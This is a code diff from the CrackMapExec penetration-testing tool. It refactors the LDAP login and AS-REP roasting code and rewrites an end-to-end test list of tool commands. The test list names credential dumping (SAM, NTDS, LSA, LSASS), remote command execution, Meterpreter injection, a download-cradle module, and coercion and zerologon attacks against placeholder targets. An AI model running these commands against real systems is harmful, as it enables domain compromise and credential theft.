self.password if not self.config.get('CME', 'audit_mode') else self.config.get('CME', 'audit_mode')*8,
ldap_error_status[errorCode] if errorCode in ldap_error_status else ''),
color='magenta' if errorCode in ldap_error_status else 'red')
ldap_error_status[error_code] if error_code in ldap_error_status else ''),
color='magenta' if error_code in ldap_error_status else 'red'
)
return False
except SessionError as e:
error, desc = e.getErrorString()
self.logger.error(u'{}\\{}{} {}'.format(self.domain,
self.logger.error(u'{}\\{}{} {}'.format(
self.domain,
self.username,
" from ccache" if useCache
else ":%s" % (kerb_pass if not self.config.get('CME', 'audit_mode') else self.config.get('CME', 'audit_mode')*8),
" from ccache" if useCache else ":%s" % (kerb_pass if not self.config.get('CME', 'audit_mode') else self.config.get('CME', 'audit_mode')*8),
str(error)),
color='magenta' if error in ldap_error_status else 'red')
color='magenta' if error in ldap_error_status else 'red'
)
return False
else:
errorCode = str(e).split()[-2][:-1]
self.logger.error(u'{}\\{}{} {}'.format(self.domain,
error_code = str(e).split()[-2][:-1]
self.logger.error(u'{}\\{}{} {}'.format(
self.domain,
self.username,
" from ccache" if useCache
else ":%s" % (kerb_pass if not self.config.get('CME', 'audit_mode') else self.config.get('CME', 'audit_mode')*8),
ldap_error_status[errorCode] if errorCode in ldap_error_status else ''),
color='magenta' if errorCode in ldap_error_status else 'red')
" from ccache" if useCache else ":%s" % (kerb_pass if not self.config.get('CME', 'audit_mode') else self.config.get('CME', 'audit_mode')*8),
ldap_error_status[error_code] if error_code in ldap_error_status else ''),
color='magenta' if error_code in ldap_error_status else 'red'
)
return False
def plaintext_login(self, domain, username, password):
@ -473,25 +522,29 @@ class ldap(connection):
self.domain = domain
if self.password == '' and self.args.asreproast:
hash_TGT = KerberosAttacks(self).getTGT_asroast(self.username)
if hash_TGT:
self.logger.highlight(u'{}'.format(hash_TGT))
hash_tgt = KerberosAttacks(self).getTGT_asroast(self.username)
if hash_tgt:
self.logger.highlight(u'{}'.format(hash_tgt))
with open(self.args.asreproast, 'a+') as hash_asreproast:
hash_asreproast.write(hash_TGT + '\n')
hash_asreproast.write(hash_tgt + '\n')
return False
try:
# Connect to LDAP
proto = "ldaps" if (self.args.gmsa or self.args.port == 636) else "ldap"
self.ldapConnection = ldap_impacket.LDAPConnection(proto + '://%s' % self.target, self.baseDN)
ldap_url = f"{proto}://{self.target}"
logging.debug(f"Connecting to {ldap_url} - {self.baseDN} [3]")
self.ldapConnection = ldap_impacket.LDAPConnection(ldap_url, self.baseDN)
self.ldapConnection.login(self.username, self.password, self.domain, self.lmhash, self.nthash)
self.check_if_admin()
# Prepare success credential text
out = u'{}\\{}:{} {}'.format(domain,
out = u'{}\\{}:{} {}'.format(
domain,
self.username,
self.password if not self.config.get('CME', 'audit_mode') else self.config.get('CME', 'audit_mode')*8,
highlight('({})'.format(self.config.get('CME', 'pwn3d_label')) if self.admin_privs else ''))
highlight('({})'.format(self.config.get('CME', 'pwn3d_label')) if self.admin_privs else '')
)
self.logger.extra['protocol'] = "LDAP"
self.logger.extra['port'] = "636" if (self.args.gmsa or self.args.port == 636) else "389"
@ -501,21 +554,24 @@ class ldap(connection):
add_user_bh(self.username, self.domain, self.logger, self.config)
if not self.args.continue_on_success:
return True
except ldap_impacket.LDAPSessionError as e:
if str(e).find('strongerAuthRequired') >= 0:
# We need to try SSL
try:
# Connect to LDAPS
self.ldapConnection = ldap_impacket.LDAPConnection('ldaps://%s' % self.target, self.baseDN)
ldaps_url = f"{proto}://{self.target}"
logging.debug(f"Connecting to {ldaps_url} - {self.baseDN} [4]")
self.ldapConnection = ldap_impacket.LDAPConnection(ldaps_url, self.baseDN)
self.ldapConnection.login(self.username, self.password, self.domain, self.lmhash, self.nthash)
self.check_if_admin()
# Prepare success credential text
out = u'{}\\{}:{} {}'.format(domain,
out = u'{}\\{}:{} {}'.format(
domain,
self.username,
self.password if not self.config.get('CME', 'audit_mode') else self.config.get('CME', 'audit_mode')*8,
highlight('({})'.format(self.config.get('CME', 'pwn3d_label')) if self.admin_privs else ''))
highlight('({})'.format(self.config.get('CME', 'pwn3d_label')) if self.admin_privs else '')
)
self.logger.extra['protocol'] = "LDAPS"
self.logger.extra['port'] = "636"
self.logger.success(out)
@ -525,68 +581,79 @@ class ldap(connection):
if not self.args.continue_on_success:
return True
except ldap_impacket.LDAPSessionError as e:
errorCode = str(e).split()[-2][:-1]
self.logger.error(u'{}\\{}:{} {}'.format(self.domain,
error_code = str(e).split()[-2][:-1]
self.logger.error(u'{}\\{}:{} {}'.format(
self.domain,
self.username,
self.password if not self.config.get('CME', 'audit_mode') else self.config.get('CME', 'audit_mode')*8,
ldap_error_status[errorCode] if errorCode in ldap_error_status else ''),
color='magenta' if (errorCode in ldap_error_status and errorCode != 1) else 'red')
ldap_error_status[error_code] if error_code in ldap_error_status else ''),
color='magenta' if (error_code in ldap_error_status and error_code != 1) else 'red'
)
else:
errorCode = str(e).split()[-2][:-1]
self.logger.error(u'{}\\{}:{} {}'.format(self.domain,
error_code = str(e).split()[-2][:-1]
self.logger.error(u'{}\\{}:{} {}'.format(
self.domain,
self.username,
self.password if not self.config.get('CME', 'audit_mode') else self.config.get('CME', 'audit_mode')*8,
ldap_error_status[errorCode] if errorCode in ldap_error_status else ''),
color='magenta' if (errorCode in ldap_error_status and errorCode != 1) else 'red')
ldap_error_status[error_code] if error_code in ldap_error_status else ''),
color='magenta' if (error_code in ldap_error_status and error_code != 1) else 'red'
)
return False
except OSError as e:
self.logger.error(u'{}\\{}:{} {}'.format(self.domain,
self.logger.error(u'{}\\{}:{} {} \nError: {}'.format(
self.domain,
self.username,
self.password if not self.config.get('CME', 'audit_mode') else self.config.get('CME', 'audit_mode')*8,
"Error connecting to the domain, are you sure LDAP service is running on the target ?"))
"Error connecting to the domain, are you sure LDAP service is running on the target?",
e
))
return False
def hash_login(self, domain, username, ntlm_hash):
self.logger.extra['protocol'] = "LDAP"
self.logger.extra['port'] = "389"
lmhash = ''
nthash = ''
lmhash = ""
nthash = ""
#This checks to see if we didn't provide the LM Hash
# This checks to see if we didn't provide the LM Hash
if ntlm_hash.find(':') != -1:
lmhash, nthash = ntlm_hash.split(':')
else:
nthash = ntlm_hash
self.hash = ntlm_hash
if lmhash: self.lmhash = lmhash
if nthash: self.nthash = nthash
if lmhash:
self.lmhash = lmhash
if nthash:
self.nthash = nthash
self.username = username
self.domain = domain
if self.hash == '' and self.args.asreproast:
hash_TGT = KerberosAttacks(self).getTGT_asroast(self.username)
if hash_TGT:
self.logger.highlight(u'{}'.format(hash_TGT))
hash_tgt = KerberosAttacks(self).getTGT_asroast(self.username)
if hash_tgt:
self.logger.highlight(u'{}'.format(hash_tgt))
with open(self.args.asreproast, 'a+') as hash_asreproast:
hash_asreproast.write(hash_TGT + '\n')
hash_asreproast.write(hash_tgt + '\n')
return False
try:
# Connect to LDAP
proto = "ldaps" if (self.args.gmsa or self.args.port == 636) else "ldap"
self.ldapConnection = ldap_impacket.LDAPConnection(proto + '://%s' % self.target, self.baseDN)
ldaps_url = f"{proto}://{self.target}"
logging.debug(f"Connecting to {ldaps_url} - {self.baseDN}")
self.ldapConnection = ldap_impacket.LDAPConnection(ldaps_url, self.baseDN)
self.ldapConnection.login(self.username, self.password, self.domain, self.lmhash, self.nthash)
self.check_if_admin()
# Prepare success credential text
out = u'{}\\{}:{} {}'.format(domain,
out = u'{}\\{}:{} {}'.format(
domain,
self.username,
self.nthash if not self.config.get('CME', 'audit_mode') else self.config.get('CME', 'audit_mode')*8,
highlight('({})'.format(self.config.get('CME', 'pwn3d_label')) if self.admin_privs else ''))
highlight('({})'.format(self.config.get('CME', 'pwn3d_label')) if self.admin_privs else '')
)
self.logger.extra['protocol'] = "LDAP"
self.logger.extra['port'] = "636" if (self.args.gmsa or self.args.port == 636) else "389"
self.logger.success(out)
@ -599,15 +666,19 @@ class ldap(connection):
if str(e).find('strongerAuthRequired') >= 0:
try:
# We need to try SSL
self.ldapConnection = ldap_impacket.LDAPConnection('ldaps://%s' % self.target, self.baseDN)
ldaps_url = f"{proto}://{self.target}"
logging.debug(f"Connecting to {ldaps_url} - {self.baseDN}")
self.ldapConnection = ldap_impacket.LDAPConnection(ldaps_url, self.baseDN)
self.ldapConnection.login(self.username, self.password, self.domain, self.lmhash, self.nthash)
self.check_if_admin()
# Prepare success credential text
out = u'{}\\{}:{} {}'.format(domain,
out = u'{}\\{}:{} {}'.format(
domain,
self.username,
self.nthash if not self.config.get('CME', 'audit_mode') else self.config.get('CME', 'audit_mode')*8,
highlight('({})'.format(self.config.get('CME', 'pwn3d_label')) if self.admin_privs else ''))
highlight('({})'.format(self.config.get('CME', 'pwn3d_label')) if self.admin_privs else '')
)
self.logger.extra['protocol'] = "LDAPS"
self.logger.extra['port'] = "636"
self.logger.success(out)
@ -617,25 +688,32 @@ class ldap(connection):
if not self.args.continue_on_success:
return True
except ldap_impacket.LDAPSessionError as e:
errorCode = str(e).split()[-2][:-1]
self.logger.error(u'{}\\{}:{} {}'.format(self.domain,
error_code = str(e).split()[-2][:-1]
self.logger.error(u'{}\\{}:{} {}'.format(
self.domain,
self.username,
nthash if not self.config.get('CME', 'audit_mode') else self.config.get('CME', 'audit_mode')*8,
ldap_error_status[errorCode] if errorCode in ldap_error_status else ''),
color='magenta' if (errorCode in ldap_error_status and errorCode != 1) else 'red')
ldap_error_status[error_code] if error_code in ldap_error_status else ''),
color='magenta' if (error_code in ldap_error_status and error_code != 1) else 'red'
)
else:
errorCode = str(e).split()[-2][:-1]
self.logger.error(u'{}\\{}:{} {}'.format(self.domain,
error_code = str(e).split()[-2][:-1]
self.logger.error(u'{}\\{}:{} {}'.format(
self.domain,
self.username,
nthash if not self.config.get('CME', 'audit_mode') else self.config.get('CME', 'audit_mode')*8,
ldap_error_status[errorCode] if errorCode in ldap_error_status else ''),
color='magenta' if (errorCode in ldap_error_status and errorCode != 1) else 'red')
ldap_error_status[error_code] if error_code in ldap_error_status else ''),
color='magenta' if (error_code in ldap_error_status and error_code != 1) else 'red'
)
return False
except OSError as e:
self.logger.error(u'{}\\{}:{} {}'.format(self.domain,
self.logger.error(u'{}\\{}:{} {} \nError: {}'.format(
self.domain,
self.username,
nthash if not self.config.get('CME', 'audit_mode') else self.config.get('CME', 'audit_mode')*8,
"Error connecting to the domain, are you sure LDAP service is running on the target ?"))
self.password if not self.config.get('CME', 'audit_mode') else self.config.get('CME', 'audit_mode') * 8,
"Error connecting to the domain, are you sure LDAP service is running on the target?",
e
))
return False
def create_smbv1_conn(self):
@ -678,7 +756,6 @@ class ldap(connection):
self.logger.highlight('Domain SID {}'.format(self.sid_domain))
def sid_to_str(self, sid):
try:
# revision
revision = int(sid[0])
@ -692,20 +769,17 @@ class ldap(connection):
# loop over the count of small endians
sub_authority = '-' + '-'.join([str(int.from_bytes(sid[8 + (i * 4): 12 + (i * 4)], byteorder='little')) for i in range(sub_authorities)])
objectSid = 'S-' + str(revision) + '-' + str(identifier_authority) + sub_authority
return objectSid
object_sid = 'S-' + str(revision) + '-' + str(identifier_authority) + sub_authority
return object_sid
except Exception:
pass
return sid
def check_if_admin(self):
# 1. get SID of the domaine
searchFilter = "(userAccountControl:1.2.840.113556.1.4.803:=8192)"
attributes= ["objectSid"]
resp = self.search(searchFilter, attributes, sizeLimit=0)
search_filter = "(userAccountControl:1.2.840.113556.1.4.803:=8192)"
attributes = ["objectSid"]
resp = self.search(search_filter, attributes, sizeLimit=0)
answers = []
if resp and self.password != '' and self.username != '':
for attribute in resp[0][1]:
@ -714,9 +788,9 @@ class ldap(connection):
self.sid_domain = '-'.join(sid.split('-')[:-1])
# 2. get all group cn name
searchFilter = "(|(objectSid="+self.sid_domain+"-512)(objectSid="+self.sid_domain+"-544)(objectSid="+self.sid_domain+"-519)(objectSid=S-1-5-32-549)(objectSid=S-1-5-32-551))"
attributes= ["distinguishedName"]
resp = self.search(searchFilter, attributes, sizeLimit=0)
search_filter = "(|(objectSid="+self.sid_domain+"-512)(objectSid="+self.sid_domain+"-544)(objectSid="+self.sid_domain+"-519)(objectSid=S-1-5-32-549)(objectSid=S-1-5-32-551))"
attributes = ["distinguishedName"]
resp = self.search(search_filter, attributes, sizeLimit=0)
answers = []
for item in resp:
if isinstance(item, ldapasn1_impacket.SearchResultEntry) is not True:
@ -725,10 +799,10 @@ class ldap(connection):
if str(attribute['type']) == 'distinguishedName':
answers.append(str("(memberOf:1.2.840.113556.1.4.1941:=" + attribute['vals'][0] + ")"))
# 3. get memeber of these groups
searchFilter = "(&(objectCategory=user)(sAMAccountName=" + self.username + ")(|" + ''.join(answers) + "))"
attributes= [""]
resp = self.search(searchFilter, attributes, sizeLimit=0)
# 3. get member of these groups
search_filter = "(&(objectCategory=user)(sAMAccountName=" + self.username + ")(|" + ''.join(answers) + "))"
attributes = [""]
resp = self.search(search_filter, attributes, sizeLimit=0)
answers = []
for item in resp:
if isinstance(item, ldapasn1_impacket.SearchResultEntry) is not True:
@ -745,9 +819,11 @@ class ldap(connection):
try:
if self.ldapConnection:
logging.debug('Search Filter=%s' % searchFilter)
resp = self.ldapConnection.search(searchFilter=searchFilter,
resp = self.ldapConnection.search(
searchFilter=searchFilter,
attributes=attributes,
sizeLimit=sizeLimit)
sizeLimit=sizeLimit
)
return resp
except ldap_impacket.LDAPSearchError as e:
if e.getErrorString().find('sizeLimitExceeded') >= 0:

232
tests/e2e_commands.txt
View File

@ -1,65 +1,171 @@
crackmapexec smb TARGET -u USER -p PASSWORD KERBEROS
crackmapexec smb TARGET -u USER -p PASSWORD KERBEROS --shares
crackmapexec smb TARGET -u USER -p PASSWORD KERBEROS --shares --filter-shares READ WRITE
crackmapexec smb TARGET -u USER -p PASSWORD KERBEROS --pass-pol
crackmapexec smb TARGET -u USER -p PASSWORD KERBEROS --disks
crackmapexec smb TARGET -u USER -p PASSWORD KERBEROS --groups
crackmapexec smb TARGET -u USER -p PASSWORD KERBEROS --sessions
crackmapexec smb TARGET -u USER -p PASSWORD KERBEROS --loggedon-users
crackmapexec smb TARGET -u USER -p PASSWORD KERBEROS --users
crackmapexec smb TARGET -u USER -p PASSWORD KERBEROS --computers
crackmapexec smb TARGET -u USER -p PASSWORD KERBEROS --rid-brute
crackmapexec smb TARGET -u USER -p PASSWORD KERBEROS --local-groups
crackmapexec smb TARGET -u USER -p PASSWORD KERBEROS --gen-relay-list /tmp/relaylistOutputFilename.txt
crackmapexec smb TARGET -u USER -p PASSWORD KERBEROS --local-auth
crackmapexec smb TARGET -u USER -p PASSWORD KERBEROS --sam
crackmapexec smb TARGET -u USER -p PASSWORD KERBEROS --ntds
crackmapexec smb TARGET -u USER -p PASSWORD KERBEROS --lsa
crackmapexec smb TARGET -u USER -p PASSWORD KERBEROS --dpapi
crackmapexec smb TARGET -u USER -p PASSWORD KERBEROS -x whoami
crackmapexec smb TARGET -u USER -p PASSWORD KERBEROS -X whoami
crackmapexec smb TARGET -u USER -p PASSWORD KERBEROS -X whoami --obfs
crackmapexec smb TARGET -u USER -p PASSWORD KERBEROS --wmi "os get"
crackmapexec smb TARGET -u USER -p PASSWORD KERBEROS -M ntdsutil
crackmapexec smb TARGET -u USER -p PASSWORD KERBEROS -M nopac
crackmapexec smb TARGET -u USER -p PASSWORD KERBEROS -M enum_av
crackmapexec smb TARGET -u USER -p PASSWORD KERBEROS -M wifi
crackmapexec smb TARGET -u USER -p PASSWORD KERBEROS -M petitpotam
crackmapexec smb TARGET -u USER -p PASSWORD KERBEROS -M spooler
crackmapexec smb TARGET -u USER -p PASSWORD KERBEROS -M dfscoerce
crackmapexec smb TARGET -u USER -p PASSWORD KERBEROS -M shadowcoerce
crackmapexec smb TARGET -u USER -p PASSWORD KERBEROS -M enum_dns
crackmapexec smb TARGET -u USER -p PASSWORD KERBEROS -M gpp_autologin
crackmapexec smb TARGET -u USER -p PASSWORD KERBEROS -M gpp_password
crackmapexec smb TARGET -u USER -p PASSWORD KERBEROS -M lsassy
crackmapexec smb TARGET -u USER -p PASSWORD KERBEROS -M impersonate
crackmapexec smb TARGET -u USER -p PASSWORD KERBEROS -M install_elevated
crackmapexec smb TARGET -u USER -p PASSWORD KERBEROS -M ioxidresolver
crackmapexec smb TARGET -u USER -p PASSWORD KERBEROS -M MS17-010
crackmapexec smb TARGET -u USER -p PASSWORD KERBEROS -M ntlmv1
crackmapexec smb TARGET -u USER -p PASSWORD KERBEROS -M runasppl
crackmapexec smb TARGET -u USER -p PASSWORD KERBEROS -M uac
crackmapexec smb TARGET -u USER -p PASSWORD KERBEROS -M webdav
crackmapexec smb TARGET -u USER -p PASSWORD KERBEROS -M wifi
crackmapexec smb TARGET -u USER -p PASSWORD KERBEROS -M winscp
crackmapexec smb TARGET -u USERNAME -p PASSWORD KERBEROS
crackmapexec smb TARGET -u USERNAME -p PASSWORD KERBEROS --shares
crackmapexec smb TARGET -u USERNAME -p PASSWORD KERBEROS --shares --filter-shares READ WRITE
crackmapexec smb TARGET -u USERNAME -p PASSWORD KERBEROS --pass-pol
crackmapexec smb TARGET -u USERNAME -p PASSWORD KERBEROS --disks
crackmapexec smb TARGET -u USERNAME -p PASSWORD KERBEROS --groups
crackmapexec smb TARGET -u USERNAME -p PASSWORD KERBEROS --sessions
crackmapexec smb TARGET -u USERNAME -p PASSWORD KERBEROS --loggedon-users
crackmapexec smb TARGET -u USERNAME -p PASSWORD KERBEROS --users
crackmapexec smb TARGET -u USERNAME -p PASSWORD KERBEROS --computers
crackmapexec smb TARGET -u USERNAME -p PASSWORD KERBEROS --rid-brute
crackmapexec smb TARGET -u USERNAME -p PASSWORD KERBEROS --local-groups
crackmapexec smb TARGET -u USERNAME -p PASSWORD KERBEROS --gen-relay-list /tmp/relaylistOutputFilename.txt
crackmapexec smb TARGET -u USERNAME -p PASSWORD KERBEROS --local-auth
crackmapexec smb TARGET -u USERNAME -p PASSWORD KERBEROS --sam
crackmapexec smb TARGET -u USERNAME -p PASSWORD KERBEROS --ntds
crackmapexec smb TARGET -u USERNAME -p PASSWORD KERBEROS --lsa
crackmapexec smb TARGET -u USERNAME -p PASSWORD KERBEROS --dpapi
crackmapexec smb TARGET -u USERNAME -p PASSWORD KERBEROS -x whoami
crackmapexec smb TARGET -u USERNAME -p PASSWORD KERBEROS -X whoami
crackmapexec smb TARGET -u USERNAME -p PASSWORD KERBEROS -X whoami --obfs
crackmapexec smb TARGET -u USERNAME -p PASSWORD KERBEROS --wmi "os get"
crackmapexec smb TARGET -u USERNAME -p PASSWORD KERBEROS -M bh_owned
crackmapexec smb TARGET -u USERNAME -p PASSWORD KERBEROS -M dfscoerce
crackmapexec smb TARGET -u USERNAME -p PASSWORD KERBEROS -M drop-sc
crackmapexec smb TARGET -u USERNAME -p PASSWORD KERBEROS -M drop-sc --options
crackmapexec smb TARGET -u USERNAME -p PASSWORD KERBEROS -M drop-sc -o CLEANUP=True
# crackmapexec smb TARGET -u USERNAME -p PASSWORD KERBEROS -M empire_exec
crackmapexec smb TARGET -u USERNAME -p PASSWORD KERBEROS -M enum_av
crackmapexec smb TARGET -u USERNAME -p PASSWORD KERBEROS -M enum_dns
crackmapexec smb TARGET -u USERNAME -p PASSWORD KERBEROS -M enum_dns --options
crackmapexec smb TARGET -u USERNAME -p PASSWORD KERBEROS -M enum_dns -o DOMAIN=google.com
crackmapexec smb TARGET -u USERNAME -p PASSWORD KERBEROS -M firefox
crackmapexec smb TARGET -u USERNAME -p PASSWORD KERBEROS -M get_netconnections
crackmapexec smb TARGET -u USERNAME -p PASSWORD KERBEROS -M gpp_autologin
crackmapexec smb TARGET -u USERNAME -p PASSWORD KERBEROS -M gpp_password
crackmapexec smb TARGET -u USERNAME -p PASSWORD KERBEROS -M handlekatz
crackmapexec smb TARGET -u USERNAME -p PASSWORD KERBEROS -M handlekatz --options
crackmapexec smb TARGET -u USERNAME -p PASSWORD KERBEROS -M handlekatz -o HANDLEKATZ_EXE_NAME="hk.exe"
crackmapexec smb TARGET -u USERNAME -p PASSWORD KERBEROS -M hash_spider
crackmapexec smb TARGET -u USERNAME -p PASSWORD KERBEROS -M impersonate
crackmapexec smb TARGET -u USERNAME -p PASSWORD KERBEROS -M install_elevated
crackmapexec smb TARGET -u USERNAME -p PASSWORD KERBEROS -M ioxidresolver
crackmapexec smb TARGET -u USERNAME -p PASSWORD KERBEROS -M keepass_discover
crackmapexec smb TARGET -u USERNAME -p PASSWORD KERBEROS -M keepass_trigger -o ACTION=CHECK USER=USERNAME
crackmapexec smb TARGET -u USERNAME -p PASSWORD KERBEROS -M lsassy
crackmapexec smb TARGET -u USERNAME -p PASSWORD KERBEROS -M masky
crackmapexec smb TARGET -u USERNAME -p PASSWORD KERBEROS -M met_inject -o SRVHOST=127.0.0.1 SRVPORT=4444 RAND=12345
crackmapexec smb TARGET -u USERNAME -p PASSWORD KERBEROS -M ms17-010
crackmapexec smb TARGET -u USERNAME -p PASSWORD KERBEROS -M msol
crackmapexec smb TARGET -u USERNAME -p PASSWORD KERBEROS -M nanodump
crackmapexec smb TARGET -u USERNAME -p PASSWORD KERBEROS -M nopac
crackmapexec smb TARGET -u USERNAME -p PASSWORD KERBEROS -M ntdsutil
crackmapexec smb TARGET -u USERNAME -p PASSWORD KERBEROS -M ntlmv1
crackmapexec smb TARGET -u USERNAME -p PASSWORD KERBEROS -M petitpotam
crackmapexec smb TARGET -u USERNAME -p PASSWORD KERBEROS -M procdump
crackmapexec smb TARGET -u USERNAME -p PASSWORD KERBEROS -M rdcman
crackmapexec smb TARGET -u USERNAME -p PASSWORD KERBEROS -M rdp --options
crackmapexec smb TARGET -u USERNAME -p PASSWORD KERBEROS -M rdp -o ACTION=enable
crackmapexec smb TARGET -u USERNAME -p PASSWORD KERBEROS -M rdp -o ACTION=disable
crackmapexec smb TARGET -u USERNAME -p PASSWORD KERBEROS -M reg-query
crackmapexec smb TARGET -u USERNAME -p PASSWORD KERBEROS -M runasppl
crackmapexec smb TARGET -u USERNAME -p PASSWORD KERBEROS -M scuffy -o SERVER=127.0.0.1 NAME=test
crackmapexec smb TARGET -u USERNAME -p PASSWORD KERBEROS -M shadowcoerce
crackmapexec smb TARGET -u USERNAME -p PASSWORD KERBEROS -M slinky -o SERVER=127.0.0.1 NAME=test
# spider_plus takes a while to run, so it is commented out during normal testing
# crackmapexec smb TARGET -u USERNAME -p PASSWORD KERBEROS -M spider_plus -o MAX_FILE_SIZE=100
crackmapexec smb TARGET -u USERNAME -p PASSWORD KERBEROS -M spooler
crackmapexec smb TARGET -u USERNAME -p PASSWORD KERBEROS -M teams_localdb
crackmapexec smb TARGET -u USERNAME -p PASSWORD KERBEROS -M test_connection --options
crackmapexec smb TARGET -u USERNAME -p PASSWORD KERBEROS -M test_connection -o HOST=localhost
crackmapexec smb TARGET -u USERNAME -p PASSWORD KERBEROS -M uac
crackmapexec smb TARGET -u USERNAME -p PASSWORD KERBEROS -M veeam
crackmapexec smb TARGET -u USERNAME -p PASSWORD KERBEROS -M wdigest --options
crackmapexec smb TARGET -u USERNAME -p PASSWORD KERBEROS -M wdigest -o ACTION=enable
crackmapexec smb TARGET -u USERNAME -p PASSWORD KERBEROS -M wdigest -o ACTION=disable
crackmapexec smb TARGET -u USERNAME -p PASSWORD KERBEROS -M web_delivery --options
crackmapexec smb TARGET -u USERNAME -p PASSWORD KERBEROS -M web_delivery -o URL=localhost/dl_cradle
crackmapexec smb TARGET -u USERNAME -p PASSWORD KERBEROS -M webdav
crackmapexec smb TARGET -u USERNAME -p PASSWORD KERBEROS -M webdav --options
crackmapexec smb TARGET -u USERNAME -p PASSWORD KERBEROS -M webdav -o MSG="Message: {}"
crackmapexec smb TARGET -u USERNAME -p PASSWORD KERBEROS -M wifi
crackmapexec smb TARGET -u USERNAME -p PASSWORD KERBEROS -M winscp
crackmapexec smb TARGET -u USERNAME -p PASSWORD KERBEROS -M zerologon
crackmapexec smb TARGET -u USERNAME -p PASSWORD KERBEROS -M spooler -M petitpotam -M zerologon -M nopac -M dfscoerce -M enum_av -M enum_dns -M gpp_autologin -M gpp_password -M lsassy -M impersonate -M install_elevated -M ioxidresolver -M ms17-010 -M ntlmv1 -M runasppl -M shadowcoerce -M uac -M webdav -M wifi
crackmapexec smb TARGET -u USERNAME -p PASSWORD KERBEROS -M bh_owned --options
crackmapexec smb TARGET -u USERNAME -p PASSWORD KERBEROS -M dfscoerce --options
crackmapexec smb TARGET -u USERNAME -p PASSWORD KERBEROS -M empire_exec --options
crackmapexec smb TARGET -u USERNAME -p PASSWORD KERBEROS -M enum_av --options
crackmapexec smb TARGET -u USERNAME -p PASSWORD KERBEROS -M firefox --options
crackmapexec smb TARGET -u USERNAME -p PASSWORD KERBEROS -M get_netconnections --options
crackmapexec smb TARGET -u USERNAME -p PASSWORD KERBEROS -M gpp_autologin --options
crackmapexec smb TARGET -u USERNAME -p PASSWORD KERBEROS -M gpp_password --options
crackmapexec smb TARGET -u USERNAME -p PASSWORD KERBEROS -M hash_spider --options
crackmapexec smb TARGET -u USERNAME -p PASSWORD KERBEROS -M impersonate --options
crackmapexec smb TARGET -u USERNAME -p PASSWORD KERBEROS -M install_elevated --options
crackmapexec smb TARGET -u USERNAME -p PASSWORD KERBEROS -M ioxidresolver --options
crackmapexec smb TARGET -u USERNAME -p PASSWORD KERBEROS -M keepass_discover --options
crackmapexec smb TARGET -u USERNAME -p PASSWORD KERBEROS -M keepass_trigger --options
crackmapexec smb TARGET -u USERNAME -p PASSWORD KERBEROS -M lsassy --options
crackmapexec smb TARGET -u USERNAME -p PASSWORD KERBEROS -M masky --options
crackmapexec smb TARGET -u USERNAME -p PASSWORD KERBEROS -M met_inject --options
crackmapexec smb TARGET -u USERNAME -p PASSWORD KERBEROS -M ms17-010 --options
crackmapexec smb TARGET -u USERNAME -p PASSWORD KERBEROS -M msol --options
crackmapexec smb TARGET -u USERNAME -p PASSWORD KERBEROS -M nanodump --options
crackmapexec smb TARGET -u USERNAME -p PASSWORD KERBEROS -M nopac --options
crackmapexec smb TARGET -u USERNAME -p PASSWORD KERBEROS -M ntdsutil --options
crackmapexec smb TARGET -u USERNAME -p PASSWORD KERBEROS -M ntlmv1 --options
crackmapexec smb TARGET -u USERNAME -p PASSWORD KERBEROS -M petitpotam --options
crackmapexec smb TARGET -u USERNAME -p PASSWORD KERBEROS -M procdump --options
crackmapexec smb TARGET -u USERNAME -p PASSWORD KERBEROS -M rdcman --options
crackmapexec smb TARGET -u USERNAME -p PASSWORD KERBEROS -M reg-query --options
crackmapexec smb TARGET -u USERNAME -p PASSWORD KERBEROS -M runasppl --options
crackmapexec smb TARGET -u USERNAME -p PASSWORD KERBEROS -M scuffy --options
crackmapexec smb TARGET -u USERNAME -p PASSWORD KERBEROS -M shadowcoerce --options
crackmapexec smb TARGET -u USERNAME -p PASSWORD KERBEROS -M slinky --options
crackmapexec smb TARGET -u USERNAME -p PASSWORD KERBEROS -M spider_plus --options
crackmapexec smb TARGET -u USERNAME -p PASSWORD KERBEROS -M spooler --options
crackmapexec smb TARGET -u USERNAME -p PASSWORD KERBEROS -M teams_localdb --options
crackmapexec smb TARGET -u USERNAME -p PASSWORD KERBEROS -M uac --options
crackmapexec smb TARGET -u USERNAME -p PASSWORD KERBEROS -M veeam --options
crackmapexec smb TARGET -u USERNAME -p PASSWORD KERBEROS -M wifi --options
crackmapexec smb TARGET -u USERNAME -p PASSWORD KERBEROS -M winscp --options
crackmapexec smb TARGET -u USERNAME -p PASSWORD KERBEROS -M zerologon --options
crackmapexec smb TARGET -u '' -p '' -M zerologon
crackmapexec smb TARGET -u '' -p '' -M petitpotam
crackmapexec ldap TARGET -u USER -p PASSWORD KERBEROS --users
crackmapexec ldap TARGET -u USER -p PASSWORD KERBEROS --groups
crackmapexec ldap TARGET -u USER -p PASSWORD KERBEROS --get-sid
crackmapexec ldap TARGET -u USER -p '' --asreproast /tmp/output.txt
crackmapexec ldap TARGET -u USER -p PASSWORD KERBEROS --kerberoasting /tmp/output2.txt
crackmapexec ldap TARGET -u USER -p PASSWORD KERBEROS --trusted-for-delegation
crackmapexec ldap TARGET -u USER -p PASSWORD KERBEROS --admin-count
crackmapexec ldap TARGET -u USER -p PASSWORD KERBEROS --gmsa
crackmapexec ldap TARGET -u USER -p PASSWORD KERBEROS -M laps
crackmapexec ldap TARGET -u USER -p PASSWORD KERBEROS -M maq
crackmapexec ldap TARGET -u USER -p PASSWORD KERBEROS -M get-desc-users
crackmapexec ldap TARGET -u USER -p PASSWORD KERBEROS -M adcs
crackmapexec ldap TARGET -u USER -p PASSWORD KERBEROS -M get-network
crackmapexec ldap TARGET -u USER -p PASSWORD KERBEROS -M get-network -o ONLY_HOSTS=true
crackmapexec ldap TARGET -u USER -p PASSWORD KERBEROS -M get-network -o ALL=true
crackmapexec ldap TARGET -u USER -p PASSWORD KERBEROS -M ldap-checker
crackmapexec winrm TARGET -u USER -p PASSWORD
crackmapexec winrm TARGET -u USER -p PASSWORD -X whoami
crackmapexec winrm TARGET -u USER -p PASSWORD --laps
crackmapexec ldap TARGET -u USERNAME -p PASSWORD KERBEROS --users
crackmapexec ldap TARGET -u USERNAME -p PASSWORD KERBEROS --groups
crackmapexec ldap TARGET -u USERNAME -p PASSWORD KERBEROS --get-sid
crackmapexec ldap TARGET -u USERNAME -p '' --asreproast /tmp/output.txt
crackmapexec ldap TARGET -u USERNAME -p PASSWORD KERBEROS --kerberoasting /tmp/output2.txt
crackmapexec ldap TARGET -u USERNAME -p PASSWORD KERBEROS --trusted-for-delegation
crackmapexec ldap TARGET -u USERNAME -p PASSWORD KERBEROS --admin-count
crackmapexec ldap TARGET -u USERNAME -p PASSWORD KERBEROS --gmsa
crackmapexec ldap TARGET -u USERNAME -p PASSWORD KERBEROS -M adcs
